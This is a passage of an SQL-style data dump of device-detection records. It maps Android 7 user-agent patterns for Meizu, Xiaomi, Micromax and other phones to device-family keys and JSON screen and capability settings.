Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M557) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M578) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M579) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M6 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M651G_MY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M653) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M655) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M6T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M760) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; M9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MEIZU E3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MEIZU M6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MHA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MHA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MI 4S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MI 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MI 5C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MI 5X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MI 5s Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MI 5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MI 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MI MAX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MI MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MIX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MIX Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MIX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MIX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MIX_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MIX_S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ML-CH-MS45_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ML450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MO-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MO-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MOON) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MOVE_7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MOVE_8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MOVIC-W2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MOVIC-W5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS40S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":600,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS457) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS457PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS459) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS50L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS50L1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS55L1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS55M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS60F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS60F_PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MS650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MSP95014) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MSP95015) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MX6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-15 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-M5 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-M6 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-M6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-M6T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-MEIZU M6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-MX6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-Meizu M6s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-Meizu M8c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-PRO 6 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-PRO 7 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-PRO 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MZ-PRO 7-S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Mars pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Max2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Maxvi_MS401) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Mega) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Meizu M6s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Meizu M8c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Mi-4c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Micromax Bharat 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Micromax C2A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Micromax E460) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Micromax Q402+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Micromax Q421) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Micromax Q4311) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Micromax Q437) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 